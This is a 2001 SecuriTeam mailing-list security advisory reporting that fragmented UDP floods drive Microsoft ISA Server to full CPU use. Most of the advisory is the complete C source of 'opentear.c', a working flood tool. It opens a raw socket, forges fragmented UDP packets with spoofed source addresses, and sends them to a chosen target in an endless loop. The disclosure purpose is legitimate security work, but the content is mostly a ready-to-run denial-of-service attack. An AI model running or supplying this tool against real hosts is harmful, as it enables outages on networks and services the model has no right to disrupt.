[NT] Microsoft ISA Server Fragmented UDP Flood Vulnerability

From: support@securiteam.com
Date: 11/04/01 

From: support@securiteam.com
To: list@securiteam.com
Subject: [NT] Microsoft ISA Server Fragmented UDP Flood Vulnerability
Message-Id: <20011104141354.89859138BF@mail.der-keiler.de>
Date: Sun,  4 Nov 2001 15:13:54 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Microsoft ISA Server Fragmented UDP Flood Vulnerability
------------------------------------------------------------------------

SUMMARY

A fragmented UDP attack through a Microsoft ISA server will cause the ISA
server to consume 100% of the CPU's time.

DETAILS

Exploit:
You can utilize opentear.c by RootShell to recreate the problem:

/*

Rootshell License

LICENSE: THIS PROGRAM MAY BE FREELY DISTRIBUTED AS LONG AS THE CONTENTS OF
THIS FILE ARE NOT MODIFIED.

This file may not be posted on AntiOnline (http://www.antionline.com) or
AntiCode (http://www.anticode.com). Their staff has a history of removing
all traces of Rootshell copyright notices on code that we write. Please
report any violations of this policy to Rootshell.

*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>

#ifdef STRANGE_BSD_BYTE_ORDERING_THING
                       
#define FIX(n) (n)
#else
#define FIX(n) htons(n)
#endif

#define IP_MF 0x2000
#define IPH 0x14
#define UDPH 0x8
#define PADDING 0x0
#define MAGIC 0x3
#define COUNT 0x1

void usage(u_char *);
u_long name_resolve(u_char *);
u_short in_cksum(u_short *, int);
void send_frags(int, u_long, u_long, u_short, u_short, u_short);

int main(int argc, char **argv)
{
    int one = 1, i, rip_sock, x=1, id=1;
    u_long src_ip = 0, dst_ip = 0;
    u_short src_prt = 0, dst_prt = 0;

    if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
    {
        perror("raw socket");
        exit(1);
    }
    if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one,
sizeof(one))
        < 0)
    {
        perror("IP_HDRINCL");
        exit(1);
    }
    if (argc < 2) usage(argv[0]);
    if (!(dst_ip = name_resolve(argv[1])))
    {
        exit(1);
    }

    srandom((unsigned)(time((time_t)0)));

    fprintf(stderr, "Sending fragmented UDP flood.\n");

    for (;;) {
      x ++;
      src_ip = x*10;
      src_prt = x*10;
      dst_prt = x+1*10;
      if (x>10)
        x = 1;
      for (i = 0; i < 10; i++)
      {
          send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt, id++);
      }
    }
    return (0);
}

void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
                u_short dst_prt, u_short id)
{
    u_char *packet = NULL, *p_ptr = NULL;
    u_char byte;
    struct sockaddr_in sin;

    sin.sin_family = AF_INET;
    sin.sin_port = src_prt;
    sin.sin_addr.s_addr = dst_ip;

    packet = (u_char *)malloc(IPH + UDPH + PADDING);
    p_ptr = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING);

    byte = 0x45;
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2;
    *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING);
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(id);
    p_ptr += 2;
    *((u_short *)p_ptr) |= FIX(IP_MF);
    p_ptr += 2;
    *((u_short *)p_ptr) = 247;
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    p_ptr += 4;
    *((u_long *)p_ptr) = src_ip;
    p_ptr += 4;
    *((u_long *)p_ptr) = dst_ip;
    p_ptr += 4;
    *((u_short *)p_ptr) = htons(src_prt);
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(dst_prt);
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(8);

    if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr
*)&sin,
                sizeof(struct sockaddr)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }
    free(packet);
}

u_long name_resolve(u_char *host_name)
{
    struct in_addr addr;
    struct hostent *host_ent;

    if ((addr.s_addr = inet_addr(host_name)) == -1)
    {
        if (!(host_ent = gethostbyname(host_name))) return (0);
        bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
    }
    return (addr.s_addr);
}

void usage(u_char *name)
{
    fprintf(stderr,
            "%s dst_ip\n",
            name);
    exit(0);
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:ts@blackhat.cc> Tamer Sahin.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.